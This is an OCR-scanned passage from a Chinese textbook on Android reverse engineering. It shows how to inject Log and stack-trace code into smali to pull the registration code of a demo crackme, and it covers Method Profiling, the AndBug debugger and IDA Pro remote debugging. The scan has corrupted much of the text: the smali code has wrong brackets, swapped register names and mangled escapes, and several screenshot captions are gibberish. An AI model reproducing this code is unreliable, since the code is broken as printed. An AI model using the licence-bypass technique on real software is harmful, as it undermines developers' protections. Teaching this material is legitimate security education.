本 小 节 实 例 为 一 个 注册 码 验 证 模拟 程序 ， 输 入 用 户 名 与 注册 码 后 点 击 
注册 按钮 ， 程 序 会 判断 注册 码 是 否 正确 ， 并 弹出 相应 的 提示 消息 ， 运 行 实 
例 程序 ， 效 果 如 图 8-4 所 示 。 


注册 码 演示 程序 


admin 


图 8-4 ”注册 码 演示 程序 
现在 我 们 的 需求 是 : 不 修改 程序 ， 找 出 用 户 名 admin 的 注册 码 。 
首先 看 看 它 的 反 汇 编 代 码 ， 使 用 Apktool 对 程序 进行 反 编 译 ， 找 到 按钮 
点 击 事件 处 理 代 码 如 下 。 


.method public onClick(Landroid/view/View;)V 
.locals 6 
.parameter "v" 
.prologue 
const/4 v5, 0x0 
.line 35 
iget-object v3, p0, Lcom/droider/sn/MainActivity$1;-»-this$0:Lcom/ 
droider/sn/MainActivity; 
invoke-static (v3), Lcom/droider/sn/MainActivity; 
-»access$0(Lcom/droider/sn/MainActivity; )Landroid/widget/EditText; 
move-result-object v3  ”# 用 户 名 文本 控件 
invoke-virtual (v3), Landroid/widget/EditText;-»getText()Landroid/text/ 
Editable; 
move-result-object v3 
invoke-interface (v3), Landroid/text/Editable;-»toString()Ljava/lang/ 
String; 
move-result-object v3  ”# 获 取 用 户 名 文本 框 的 内 容 
invoke-virtual (v3), Ljava/lang/String;-»trim()Ljava/lang/String; 
move-result-object v2 # 去 除 用 户 名 的 空格 
.line 36 
.local v2, strUserName:Ljava/lang/String; 
iget-object v3, p0, Lcom/droider/sn/MainActivity$1;-»this$0:Lcom/droider/ 
sn/MainActivity; 
invoke-static (v3), Lcom/droider/sn/MainActivity; 
-»access$1(Lcom/droider/sn/MainActivity; )Landroid/widget/EditText; 
move-result-object v3 4H E 
invoke-virtual (v3), Landroid/widget/EditText;-»getText()Landroid/text/ 
Editable; 
move-result-object v3 
invoke-interface (v3), Landroid/text/Editable;-»toString()Ljava/lang/ 
String; 
move-result-object v3 43k 
invoke-virtual (v3), Ljava/lang/String;-»trim()Ljava/lang/String; 
move-result-object v1  ”# 去 除 注册 码 中 的 空格 
.line 37 
.local v1, strPassword:Ljava/lang/String; 
invoke-virtual (v2), Ljava/lang/String;-»length()I 
move-result v3  # 用 户 名 长 度 
if-eqz v3, :cond O # 用 户 名 不 能 为 室 
invoke-virtual {v1}, Ljava/lang/String;-»length()I 


move-result v3  # 注 册 码 长 度 
if-nez v3, :cond 1 
.line 38 
:cond_0 # 提 示 用 户 名 与 注册 人 码 不 能 为 空 
iget-object v3, p0, Lcom/droider/sn/MainActivity$1;-»this$0:Lcom/droider/ 
sn/MainActivity; 
const-string v4, "Nu8bf7Nu8f93Nu5165Nu7528Nu6237Nu540dNu4e0eNu6ce8Nu518c^ 
u7801" 
invoke-static (v3, v4, v5), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v3 
invoke-virtual (v3), Landroid/widget/Toast;-»show()V 
.line 47 
:goto 0 
return-void # 子 程序 返回 
.line 41 
:cond 1 
iget-object v3, p0, Lcom/droider/sn/MainActivity$1;-»this$0:Lcom/droider/ 
sn/MainActivity; 
invoke-static (v3, v2}, Lcom/droider/sn/MainActivity; 
-»access$2 (Lcom/droider/sn/MainActivity;Ljava/lang/String;)Ljava/lang/ 
String; 
move-result-object v0  # 根 据 用 户 名 计算 注册 码 
.line 42 
.local v0, realSN:Ljava/lang/String; 
invoke-virtual (vl, v0), Ljava/lang/String;--»equalsIgnoreCase (Ljava/ 
lang/String;)Z 
move-result v3 
if-eqz v3, :cond 2 # 比 较 注 册 码 是 否 正 确 
.line 43 
iget-object v3, p0, Lcom/droider/sn/MainActivityS$1;-»this$0:Lcom/ 
droider/sn/MainActivity; 
const-string v4, "\u6ce8\u518c\u7801\u6b63\u786e" 
invoke-static (v3, v4, v5), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 
move-result-object v3 
invoke-virtual (v3), Landroid/widget/Toast;-»show()V  # 弹 出 注册 码 正确 
goto :goto_0 


.line 45 

:cond 2 

iget-object v3, p0, Lcom/droider/sn/MainActivity$1;-»this$0:Lcom/ 

droider/sn/MainActivity; 

const-string v4, "Nu6ce8Nu518cNu7801Nu9519Nu8bef" 

invoke-static (v3, v4, v5), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 

move-result-object v3 

invoke-virtual (v3), Landroid/widget/Toast;-»show()V  # 弹 出 注册 码 错误 

goto :goto_0 

.end method 


仔细 阅读 上 面 的 反 汇 编 代 码 ， 会 发 现 line 42 行 的 “if-eqz v3, :cond_2” 是 


程序 的 关键 部 分 ， 通 过 比较 v1 (输入 的 注册 码 ) 与 v0 (计算 所 得 的 注册 
码 ) 的 值 ， 来 判断 注册 码 是 否 正确 ， 因 此 ， 此 处 要 想 获 取 真 实 的 注册 码 只 
需要 在 42 行 处 加 入 Log.v0 输 出 v0 寄存 器 的 值 即 可 。 相 应 的 反 汇 编 代码 如 


下 : 


const-string v3, "SN" 


invoke-static (v3, v0), Landroid/util/Log;-»v(Ljava/lang/String;Ljava/lang/ 


String;)I 
修改 完成 后 的 代码 如 图 8-5 所 示 。 


Ñ Y:XTempiXsniXsmaliXcomidroiderXsnAMainActivity$1.smali — Notepad++ 
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.line 42 

.local v0, realSN:Ljava/lang/String; 

const-string v5, "SN" 

invoke-static (v3, v0), Landroid/util/Log;-»v(Ljava/lang/String;Ljava/lang/String;)I 
invoke-virtual (vi, v0), Ljava/lang/String;-»equalsIgnoreCase(Ljava/lang/String:;)Z 


move-result v5 


if-eqz v3, :cond 2| 


length : 4465 lines : 163 In- 134 Col : 23 Sel :0 Dos\Windows 
图 8-5 ”手工 注入 Log.v0 的 代码 


将 修改 完成 的 代码 使 用 Apktool 重 新 打包 ， 签 名 并 再 次 运行 该 程序 。 输 


入 用 户 名 “admin” 与 任意 的 注册 码 ， 此 时 仍然 会 弹出 注册 码 错误 的 提示 ， 但 


Log.v0 方 法 却 “ 偷 偷 地 ”输出 了 正确 的 注册 码 ， 在 命令 提示 符 中 执行 “adb 
logcat -s SN:v” 输 出 信息 如 下 (注册 码 为 用 户 名 的 MD5 值 ) 。 

V/SN ( 414): 21232£f297a57a5a743894a0e4a801fc3 

使 用 代码 注入 除了 可 以 精确 的 输出 程序 运行 时 的 中 间 结 果 ， 还 可 以 作 
为 程序 分 析 时 的 “风向 标 ”。 例 如 在 分 析 过 长 的 方法 代码 时 ， 很 难 确定 一 些 
想 要 “关注 ”的 代码 是 否 被 调用 过 ， 这 时 就 可 以 在 这 些 代 码 的 开头 注入 Log 输 
出 的 代码 ， 程 序 运 行 时 通过 查看 是 否 有 Log 输 出 来 判断 代码 是 否 被 调用 过 。 


8.3.2 ” 栈 跟踪 法 


使 用 LogCat 配 合 代码 注入 在 分 析 程 序 时 屡 试 不 夹 ， 但 需要 分 析 人 员 阅 
读 大 量 的 反 汇编 代码 来 寻找 程序 的 “输出 点， 这 期 间 可 能 需要 多 次 手动 注 
入 Log 输 出 代码 ， 如 果 分 析 大 型 程序 的 话 ， 这 很 显然 是 一 件 累 人 的 天 差事 ， 
这 种 情况 下 就 需要 另 一 种 快速 定位 程序 关键 点 的 方法 。 

栈 跟 踪 法 同样 属于 代码 注入 的 范畴 ， 它 主要 是 手动 向 反 汇 编 后 的 smali 
文件 中 加 入 栈 跟 踪 信息 输出 的 代码 。 与 注入 Log 输 出 的 代码 不 同 的 是 ， 栈 跟 
踪 法 只 需要 知道 大 概 的 代码 注入 点 。 而 且 注 入 代码 后 的 反馈 信息 比 Log 注 入 
要 详细 的 多 。 运 行 本 小 节 的 实例 ， 效 果 如 图 8-6 所 示 ， 程 序 运行 后 弹出 了 
Toast， 现 在 我 们 的 需求 是 : 这 个 Toast 是 何 时 被 调用 的 ? 
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图 8-6  stackTraceSz jj 
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法 来 查找 Toast 的 调用 ， 最 终 发 现 如 下 代码 。 


.method private c()V 
.locals 2 
.prologue 
.line 27 
const-string v0, "who called me?" 
const/4 v1, 0x0 
invoke-static (p0, v0, v1), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 
move-result-object v0 
invoke-virtual (v0), Landroid/widget/Toast;-»show()V 
.line 29 
return-void 
.end method 


Toast 是 由 上 面 line 27 行 处 的 代码 调用 的 ， 现 在 只 需要 在 它 的 下 面 也 就 
是 line 29 行 处 加 入 输出 栈 跟 踪 信 息 的 代码 即 可 。 相 应 的 Java 代 码 如 下 : 


new Exception("print trace").printStackTrace(); 


将 其 转换 成 smali 语 法 的 反 汇 编 代 码 为 : 

new-instance v0, Ljava/lang/Exception; 

const-string vl, "print trace" 

invoke-direct (v0, v1), Ljava/lang/Exception;-»«init»(Ljava/lang/String;)V 
invoke-virtual (v0), Ljava/lang/Exception;-»printStackTrace()V 


修改 完成 后 的 代码 如 图 8-7 所 示 。 


Wi *Y:XTempXstackIraceXsmaliXcomXdroiderXstackTraceMWainActivity.smali 一 Notepad++ 
文件 于) eim) HRO 视图 如 格式 如 FEV KEO ZO ETA MtO GOW 2 
e EREA- IEE e E-2E E 3 a EE, 图 加 e| m 
E Wlain&ctivity. smali | 
39 E] method private c()V 
40 -locals 2 
41 prologue 
42 .line 27 
3 const-string v0, "who called me?" 
const/4 vi, 0x0 
invoke-static (50, v0, vi), Landroid/widget/Toast;-»makeText(Landroid/content/Context;Ljava/lang/CharSequen 


move-result-object vO 


invoke-virtual {v0}, Landroid/widget/Toast;-»show()V 

new-instance v0, Ljava/lang/Exception; 

const-string vi, "print trace" 

invoke-direct (vO, vi), Ljava/lang/Exception;-»«init»(Ljava/lang/String:)V 
invoke-virtual (v0), Ljava/lang/Exception;-»printStackTrace()V 


.line 29 
return-void 
.end method 


z ^ 


User Define File - smali length : 2444 lines : : : B DosVMlindows 


图 8-7 手工 注入 栈 跟踪 信息 输出 的 代码 


将 修改 完成 的 代码 使 用 Apktool 重 新 打包 ， 签 名 后 再 次 运行 程序 ， 
LogCat 窗 口 便 会 输出 栈 跟踪 信息 。 栈 跟踪 信息 是 WARN 级 别 ， 而 且 Tag 名 称 
被 系统 命名 为 System.err ， 因 此 在 命令 提示 符 下 输入 “adb logcat -s 
System.err:V *:W” 也 会 输出 同样 的 栈 跟 踪 信 息 ， 输 出 结果 如 下 。 


W/System.err( 1440): java.lang.Exception: print trace 

W/System.err( 1440):at com.droider.stackTrace.MainActivity.c(MainActivity. 
java:27) 

W/System.err( 1440):at com.droider.stackTrace.MainActivity.b(MainActivity. 
java:23) 

W/System.err( 1440):at com.droider.stackTrace.MainActivity.a(MainActivity. 
java:19) 

W/System.err( 1440): at com.droider.stackTrace.MainActivity.onCreate 
(MainActivity.java:15) 

W/System.err( 1440): at android.app.Instrumentation.callActivityOnCreate 
(Instrumentation.java:1047) 

W/System.err( 1440): at android.app.ActivityThread.performLaunchActivity 
(ActivityThread.java:1611) 

W/System.err( 1440): at android.app.ActivityThread.handleLaunchActivity 
(ActivityThread.java:1663) 

W/System.err( 1440): at android.app.ActivityThread.access$1500(Activity- 
Thread.java:117) 

W/System.err( 1440):at android.app.ActivityThread$H.handleMessage (Activity- 
Thread.java:931) 

W/System.err( 1440):at android.os.Handler.dispatchMessage(Handler.java:99) 
W/System.err( 1440):at android.os.Looper.loop(Looper.java:123) 
W/System.err( 1440):at android.app.ActivityThread.main(ActivityThread. 
java:3683) 

W/System.err( 1440) :at java.lang.reflect.Method.invokeNative (Native Method) 
W/System.err( 1440):at java.lang.reflect.Method.invoke(Method.java:507) 
W/System.err( 1440):at com.android.internal.os. 
ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:839) 

W/System.err( 1440):at 
com.android.internal.os.ZygoteInit.main(ZygoteInit.java:597) 


W/System.err( 1440):at dalvik.system.NativeStart.main(Native Method) 


栈 跟踪 信息 记录 了 程序 从 启动 到 printStackTrace0O 被 执行 期 间 所 有 被 调 
用 过 的 方法 。 从 下 往 上 查看 栈 跟 踪 人 信息， 找到 第 一 条 以 


com.droider.stackTrace 开 头 的 信息 ， 发 现 最 开始 调用 的 是 OnCreate0， 然 后 依 
次 是 a0、b0、c0， 如 此 一 来 ， 函 数 的 执行 流程 就 一 清二 区 了 。 


8.3.3 Method Profiling 


Windows3E & EX $4 8 S BSOllydbg 38 ites A —"ltraceUJBE,. C BJ fF FH 
是 在 执行 程序 时 记录 下 每 个 被 调用 的 API 名 称 ， 分 析 人 员 只 需 查 看 API 的 调 
用 序列 即 可 知道 这 段 代 码 的 具体 用 途 。 这 个 功能 十 分 强大 ，DDMS 中 也 提 
供 了 类 似 的 调试 方法 ， 它 就 是 Method Profiling (方法 剖析 ) o 

本 小 节 的 演示 实例 模拟 了 多 级 方法 调用 ， 上 点 击 *MethodProfiling” 按 钮 
后 ， 程 序 会 执行 一 系列 的 方法 。 运 行 实例 程序 ， 效 果 如 图 8-8 所 示 。 
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图 8-8 Method Profiling 演 示 程 序 


在 DDMS 的 Devices 窗 口中 选择 com.droidermethodprofiling 程 序 ， 点 击 
Devices 旁 边 工具 栏 上 的 “Start Method Profiling” 按 钮 开启 Method Profiling , 
如 图 8-9 所 示 。 


mi Devices 23 ik a T E3 


Hane 人 
e 口 emulator-5554 Ünline Àndroid2.3.3 ... 
system process TS 88500 
Jp. co. omronsoft. openwnn 151 8602 
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com. android. phone 158 8604 
com. android. settings 20T 88601 
com. android.launcher 224 8605 
android. process. acore 231 8606 
com. android. deskclock 252 8607 
android. process. media 269 8608 
com. android. quicksearchbox 286 8609 
com. android. protips 296 8610 
com. android. music 309 8611 
com. android. mms 319 8612 
com. android. email 342 8613 
com. android. defcontainer Su 8615 
om. svox. pico 8616 


com. droider. methodprofiling |2531 | | |8614 / 8700 | trauen 


图 8-9 开启 Method Profiling 


此 时 “Start Method Profiling” 按 钮 的 提示 文字 会 变 成 “Stop Method 
Profiling”， 切 换 到 程序 的 运行 界面 点 击 “MethodProfiling” 按 钮 ， 等 程序 a 
完 Toast 后 点 击 “Stop Method Profiling” 17 1E Method Profiling ， 稍 等 片刻 ， 
自动 弹出 TraceView 窗 口 ， 如 图 8-10 所 示 。 
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图 8-10 TraceView O 


TraceView 窗 口 Name 一 栏 中 显示 的 方法 调用 就 是 我 们 需要 关注 的 地 方 ， 
每 一 个 方法 调用 都 有 一 个 数字 编号 ， 不 同 的 方法 调用 采用 不 同 的 颜色 区 
分 ， 点 击 方法 调用 左边 的 加 号 展开 任意 一 个 方法 调用 都 会 看 到 其 下 有 
Parents 与 Children 两 个 子 项 ， 其 中 Parents 表 示 该 方法 被 哪个 方法 调用 ， 
Children 表 示 该 方法 调用 了 哪些 方法 。 所 有 的 方法 调用 都 以 链表 的 形式 依次 
显示 ， 显 示 的 顺序 与 栈 跟 踪 的 输出 信息 恰恰 相反 。 

从 Name 列 表 的 第 8 个 方法 调用 Onclick0 开始， 依次 展开 它们 的 
Children， 最 后 可 以 看 到 点 击 “MethodProfiling” 按 钮 后 执行 的 所 有 方法 ， 如 
图 8-11 所 示 ， 显 示 效 果 比 栈 跟踪 信息 还 要 直观 。 
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图 8-11 ”使 用 TraceView 查 看 方法 调用 


如 果 我 们 想 要 执行 Method Profiling 的 代码 一 开始 就 执行 了 ， 例 如 上 一 
节 的 stackTrace 实 例 ， 要 想 对 它 使 用 Method Profiling 就 需要 查找 开始 点 与 结 
束 点 ， 然 后 手动 注入 代码 。Method Profiling 本 身 就 是 Android SDK 中 提供 的 
调试 支持 ， 而 并 非 DDMS 所 特有 ， 在 android.os.Debug 类 中 ， 提 供 了 
startMethodTracing() 与 stopMethodTracing() 两 个 方法 来 开启 与 关闭 Method 
Profiling。 例 如 下 面 的 代码 。 


android.os.Debug.startMethodTracing("123"); 

a(); 

android.os.Debug.stopMethodTracing(); 

字符 串 “123” 为 trace 文 件 名 ， 上 面 的 代码 在 执行 后 会 在 SD 卡 的 根 目录 中 
生成 123.trace 文 件 ， 这 个 文件 包含 了 a() 方 法 执行 过 程 中 所 有 的 方法 调用 与 
CPU 占用 时 间 等 信息 ， 可 以 使 用 Android SDK 中 提供 的 traceview 工 具 来 打开 
它 ， 该 工具 是 Android SDK 的 tools 目 录 下 的 一 个 脚本 文件 ， 使 用 方法 是 先 执 
行 “adb pull/mnt/sdcard/123.trace” 导 出 123.trace 文 件 ， 然 后 执行 “traceview 
123.trace" 打 开 TraceView 窗 口 ， 显 示 效 果 与 在 DDMS 中 直接 调用 是 一 样 的 。 
另外 ， 注 入 的 代码 在 运行 时 需要 往 SD 卡 中 写 入 文件 ， 因 此 还 需要 在 反 编 译 
的 Android-Manifest.xml 文 件 中 添加 SD 卡 写 入 权限 ， 代 码 如 下 : 


«uses-permission android:name-"android.permission.WRITE EXTERNAL STORAGE"/> 


如 果 手 动 注入 Method Profiling 代 码 的 起 始点 与 结束 点 不 好 确定 ， 我 们 
可 以 将 它 的 范围 设置 的 大 一 些 ， 如 在 Activity 的 OnCreate0) 方 法 中 注入 
startMethodTracing() 的 代码 ， 反 汇编 代码 如 下 。 


const-string v0, "123" 


invoke-static (v0), Landroid/os/Debug;-»startMethodTracing (Ljava/lang/ 


String;)V 
然后 在 Activity 的 OnStop0 方 法 中 注入 stopMethodTracing() 的 代码 ， 反 汇 
编 代码 如 下 。 


invoke-static {}, Landroid/os/Debug;->stopMethodTracing ()V 


这 样 当 程序 打开 并 关闭 后 就 会 生成 123.trace 文 件 ， 接 下 来 使 用 traceview 
工具 来 手动 分 析 它 即 可 。 


8.4 ”使 用 AndBug 调 试 Android 程 序 


AndBug 是 一 款 开 源 的 脚本 式 的 Android 程 序 动态 调试 器 。 使 用 Python 语 
言 开发 ， 调 试 接口 与 Android SDK 中 提供 的 调试 插件 相同 ， 采 用 JDWP 协 议 
与 Dalvik 调 试 监视 器 (DDM) 挂 勾 Dalvik 虚 拟 机 的 方法 来 获取 进程 状态 。 然 
而 与 Android SDK 提 供 的 调试 插件 有 所 不 同 的 是 ， 使 用 AndBug 调 试 Android 
程序 并 不 需要 事先 拥有 Android 程 序 源码 ， 因 此 ， 对 于 Android 开 发 人 员 与 逆 
向 分 析 人 员 来 说 ， 这 都 是 一 款 不 错 的 调试 工具 。 项 目 主 页 为 : 
https://github.com/swdunlop/AndBugo 


8.4.1 ”安装 AndBug 


目前 AndBug 只 支持 Linux 系 统 ， 安 装 步骤 如 下 : 

1. 安装 python-dev 和 Python-pyrex 两 个 库 。 在 终端 提示 符 下 执行 “sudo 
apt-get install python-dev python-pyrex"c 

2. 安装 bottle 库 。 到 http://pypi.python.org/pypi/bottle 下 载 最 新 的 bottle 库 
源码 ， 解 压 后 在 终端 提示 符 下 执行 “sudo python setup.py install”。 


3. F AndBug 源码 。 在 终端 提示 符 下 执行 “git clone 
https://github.com/swdunlop/AndBug.git”o 

4. 编译 AndBug。 进 入 AndBug 目 录 ， 在 终端 提示 符 下 执行 make 命 令 。 

5 .设置 环境 变量 。 在 ~/bashrc 文件 中 加 E export 
PYTHONPATH-$PY THONPATH: /lib, EE 和 端 。 

以 上 安装 步骤 一 般 不 会 出 错 ， 顺 利安 装 完成 后 在 终端 提示 符 下 执 
行 .Jandbug 会 显示 帮助 信息 。 


8.4.2 ”使 用 AndBug 


使 用 AndBug 调 试 Android 程 序 需 要 先 执 行 被 调试 的 程序 ， 然 后 使 用 
AndBug 附 加 到 该 程序 进程 上 进行 调试 。 下 面 以 8.3.3 小 节 ee 
实例 进行 演示 。 首 先 运行 MethodProfiling 程 序 ， 然 后 在 终端 提示 符 下 执行 
“adb shell ps” 列 出 所 有 的 进程 ， 输 出 如 下 。 


androidGhoneynet:-/tools/andbug$ adb shell ps 


USER PID PPID VSIZE RSS WCHAN PC NAME 
root 1 0 268 180 c009b74c 0000875c S /init 

root 2 0 0 0 c004e72c 00000000 S kthreaad 
root 3 2 0 0 c003fdc8 00000000 S ksoftirqd/0 
root 4 2 0 0 c004b2c4 00000000 S events/0 
root 5 2 0 0 c004b2c4 00000000 S khelper 
root 6 2 0 0 c004b2c4 00000000 S suspend 


app 28 337 32 85992 23060 ffffffff aftd0c51c S com.android.email 

app 3 320: :32 84972 20012 ffffffff afdO0c5lc S com.android. defcontainer 
app 9 383 32 82888 19428 ffffffff afdO0c5lc S com.svox.pico 

app 34 396 32 87564 21520 ffffffff afd0c51c S com.droider.stackTrace 
app 35 433 32 92696 24796 ffffffff afd0c5lc S com.droider.methodprofiling 
root 461 40 732 328  Ác003da38 afd0c3ac S /system/bin/sh 

root 462 4461 888 324 00000000 afd0b45c R ps 


从 输出 中 发 现 程序 的 进程 ID 为 433， 下 面 执行 “./andbug shell -p 433"3K 
附加 AndBug 调 试 器 。 成 功 的 话 会 进入 AndBug 的 Shell 环 境 ， 效 果 如 图 8-12 所 
o 


$O O6 android&honeynet: ~/tools/andbug 


File Edit View Terminal Help 


370 32 84972 20012 ffffffff afdOc5lc com.android.defcontainer 
383 32 82888 19428 ffffffff afdOc51c S com.svox.pico 

396 32 87564 21520 ffffffff afdOc5lc com.droider.stackTrace 
433 32 92696 24796 ffffffff afdOc5lc com.droider.methodprofili 


467 40 732 328 c003da38 afd0c3ac S /system/bin/sh 
468 467 888 324 00000000 afdOb45c R ps 
androidghoneynet:-/tools/andbug$ ./andbug shell -p 433 


图 8-12 ”使 用 AndBug 调 试 Android 程 序 


使 用 AndBug 调 试 Android 程 序 时 ， 请 确保 DDMS 没 有 运行 ! 因为 AndBug 与 程序 的 JDWP 线 程 进行 
通信 时 ， 自 动 完成 了 端口 转发 ， 而 DDMS 的 端口 转发 功能 会 影响 到 AndBug 的 通信 连接 。 


进入 Shell 环 境 后 执行 help 命 令 查看 AndBug 支 持 的 命令 。 这 些 命令 可 以 
在 AndBug 的 /lib/andbug/cmd 目 录 下 找到 相应 的 源码 ， 有 兴趣 的 读者 可 以 看 


看 。 这 些 命令 分 别 是 : 
break: 设置 断 点 。 
break-list: 列举 所 有 的 活动 断 点 与 钩子 。 
break-remove: 删除 断 点 或 钩子 。 
class-trace: 方法 跟踪 ， 报 告 一 个 类 中 所 有 被 调用 的 Dalvik 方 法 。 
classes: 列表 所 有 已 加 载 的 类 。 
dump: 输出 指定 源 文 件 中 所 有 的 方法 。 
exit: 中 止 调试 会 话 。 
help: 显示 帮助 信息 。 
inspect: 检查 一 个 对 象 。 
method-trace: 方法 跟踪 ， 报 告 方 法 中 调用 的 Dalvik 方 法 。 
methods: 列 出 一 个 类 中 的 所 有 方法 。 


navi: 使 用 HTTP 服 务 ， 支 持 通 过 浏览 器 显示 进程 中 所 有 线程 的 状态 信 


resume: 恢复 程序 执行 。 

shell: 为 特定 的 进程 启动 一 个 AndBug Shell。 

source: 添加 产 代 码 目录 。 

statics: 列 出 一 个 类 中 的 所 有 方法 。 

suspend: 暂停 进程 中 的 线程 。 

thread-trace: 线程 跟踪 ， 报 告 进程 所 调用 的 线程 。 

threads: 列 出 进程 中 所 有 的 线程 。 

接 下 来 在 终端 提示 符 下 输入 classes 列 出 所 有 已 加 载 的 类 ， 在 其 中 可 以 找 
到 android.widget.Toast 类 ， 它 的 show0 方 法 就 是 用 来 弹出 Toast 的 。 输 入 
“break android.widget.Toast” 对 这 个 类 设置 断 点 ， 如 果 没 有 错误 会 输出 类 似 下 
面 的 结果 。 


>> break android.widget.Toast 
## Setting Hooks 
-- Hooked «536870916» android.widget.Toast «class 'andbug.vm.Class'-» 


断 点 设置 好 后 回 到 程序 运行 界面 ， 点 击 *MethodProfiling” 按 钮 ， 这 时 
AndBug 会 自动 中 断 ， 终 端 提示 符 下 会 有 如 下 输出 信息 。 


>> ## Breakpoint hit in thread «1» main (running suspended), process suspended. 

-- android.widget.Toast.makeText (Landroid/content/Context;Ljava/lang/ 
CharSeque nce;I)Landroid/widget/Toast;:0 

-- com.droider.methodprofiling.MainActivity.c()V:3 

-- com.droider.methodprofiling.MainActivity.b()V:0 

-- com.droider.methodprofiling.MainActivity.a()V:0 

-- com.droider.methodprofiling.MainActivity.access$0 (Lcom/droider/ 
methodprofiling/MainActivity;)V:0 

-- com.droider.methodprofiling.MainActivityS$1.onClick(Landroid/view/View;) 
Va2 

-- android.view.View.performClick()2:14 

-- android.view.View$PerformClick.run()V:2 

-- android.os.Handler.handleCallback(Landroid/os/Message;)V:2 

-- android.os.Handler.dispatchMessage (Landroid/os/Message;)V:4 

-- android.os.Looper.loop()V:75 

-- android.app.ActivityThread.main([Ljava/lang/String;)V:31 

-- java.lang.reflect.Method.invokeNative(Ljava/lang/Object; [Ljava/lang/ 
Object; Ljava/lang/Class; [Ljava/lang/Class;Ljava/lang/Class;IZ)Ljava/ 
lang/Object; «native» 

-- java.lang.reflect.Method.invoke ((Ljava/lang/Object; [Ljava/lang/Object;) 
Ljava 
/lang/Object;:18 

-- com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run()V:11 

-- com.android.internal.os.ZygoteInit.main([Ljava/lang/String;)V:84 

-- dalvik.system.NativeStart.main([Ljava/lang/String;)V «native» 


输出 的 内 容 与 栈 跟 踪 法 中 使 用 printStackTrace0 的 输出 结果 是 一 样 的 。 
接 下 来 执行 resume 命 令 让 程序 恢复 执行 ， 然 后 执行 navi 命 令 开启 HITP 服 
务 ， 打 开 浏 览 器 并 输入 http://localhost: 8080， 如 图 8-13 所 示 ， 浏 览 器 显示 了 
OnClick(0 方 法 执行 后 的 Main 线 程 的 栈 跟 踪 信息 。 


OO O0 AndBug Navi - Mozilla Firefox 
File Edit View History Bookmarks Tools Help 
; AndBug Navi 
localhost vC yv a f 
分 androguard ffjapkinspector 入 droidbox (fdex2jar smali fyapktoo! (ded :$ Android Developers 


Thread: «1» main (running suspended) 
a.w.T.«init»:0 
this- 
context- 


a.w.T.makeText:2 
duration-z 
text- 
contextz 


.d.m.M.c:3 
this- 


.d.m.M.b:0 


this- 


.d.m.M.a:0 
this= 


.d.m.M.access$0:0 
.d.m.M.onClick:2 


this- 


图 8-13 ”通过 浏览 器 访问 进程 状态 


由 于 AndBug 不 支持 单 步调 试 Android 程 序 ， 并 且 无 法 对 自 定义 的 方法 设 
置 断 点 ， 因 此 ， 在 使 用 过 程 中 可 能 会 感到 诸多 不 便 ， 读 者 在 分 析 程 序 过 程 
中 可 以 根据 实际 需要 使 用 它 ， 另 外 ，AndBug 是 一 个 脚本 式 的 调试 器 ， 人 允许 
分 析 人 员 编写 脚本 来 扩展 它 ， 有 兴趣 的 读者 可 以 深入 地 研究 一 下 。 


8.5 ”使 用 IDA Pro 调 试 Android 原 生 程序 


IDA Pro 从 6.1 版 本 开始 ， 支 持 动 态 调试 Android 原 生 程序 。 本 节 将 通过 
两 个 实例 来 介绍 ， 如 何 使 用 IDA Pro 来 动态 调试 一 般 的 Android 原 生 程序 
(如 /system/bin 下 提供 的 adbd) 与 apk 中 打包 的 so 动态 链接 库 。 


8.5.4 调试 Android 原 生 程序 


调试 一 般 的 Android 原 生 程 序 可 以 采用 远程 运行 与 远程 附加 两 种 方式 来 
调试 ， 远 程 附加 调试 将 在 下 一 小 节 调 试 动态 链接 库 时 介绍 ， 本 小 节 介 绍 如 
何以 远程 运行 的 方式 来 调试 原生 程序 。 

将 本 小 节 的 实例 程序 debugnativeapp 复制 到 Android 设 备 中 ， 
如 /data/localMtmp 目录 ， 接 着 将 IDA Pro 软 件 目 录 的 android_server 复 制 到 
Android 设 备 中 ， 本 实例 演示 时 同样 放 到 了 /data/local/tmp 目 录 ， 在 命令 提示 
符 下 执行 以 下 两 行 命 令 给 两 个 文件 加 上 可 执行 权限 。 

adb shell chmod 755 /data/local/tmp/debugnativeapp 

adb shell chmod 755 /data/local/tmp/android server 

接着 执行 “adb shell/data/local/tmp/android server" , 启动 IDA Pro 的 


Android 调 试 服务 器 ， 会 输出 如 下 信息 。 
C:\ >adb shell /data/local/tmp/android server 
IDA Android 32-bit remote debug server(ST) v1.14. Hex-Rays (c) 2004-2011 
Listening on port 423946... 


程序 提示 调试 服务 器 已 经 启动 ， 并 且 监 听 了 23946 号 端口 。 打 开 另 一 个 
命令 提示 符 执 行 以 下 命令 开启 端口 转发 。 

adb forward tcp:23946 tcp:23946 

现在 启动 IDA Pro Xx Te Fe, rash 3€ 88 Ji "Debugger -> Run -> Remote 
ArmLinux/Android debugger”， 打 开 调 试 程序 设置 对 话 框 。 在 Application 一 
栏 中 输 A "/data/local/tmp/debugnativeapp" , 在 Directory 一 栏 中 输入 
“/data/local/tmp/”， 在 HostName 一 栏 中 输入 localhost， 如 图 8-14 所 示 。 


À Debug application setup: armlinux 


Application |/data/local/tmp/debugnativeapp 


Directory  /data/local/tmp 


Parameters 


Debug options 


Hostname localhost v Port |23946 


1 


Password | wl 


闻 Save network settines as default 


图 8-14 ”调试 程序 设置 对 话 框 


设置 完成 后 点 击 OK 按 钮 ，IDA Pro 就 会 远程 的 执行 debugnativeapp， 并 
自动 切换 到 调试 界面 ， 如 图 8-15 所 示 ，IDA Prot ME f mainQER ZA BJ ALTI 
处 。 


A IDA - /data/local/tmp/debugnatigeapp mE 
File Edit Jump Search Vier Debuezer Options Windows Help 
D Orate am d Prr m Bv m 3ootbu (o3 edo ox | 
mu , 
2:0 | HH 1 1 I l | E: 3 
IDA Vie-PC, General registers, Modules, Threads, Hex Viewl, Stack viec €J | [A] Structures [ tal Enuns 
I Viet B X X General registers 8x 
RO 99008550 w start SIN 9 
R1 00088008 u z 1 
Ma som R2 B9012578 w debug001:B0012570 b M 
e E "E 
; Segnent type: Pure code BUHETER 
00068550 AREA .text, CODE, ALIGN-h ad ecu 
90808550 ; ORG 6x8556 RS 00000000 u T 89 
00808558 CODE32 Ró 00008000 w ,, MODE 10 
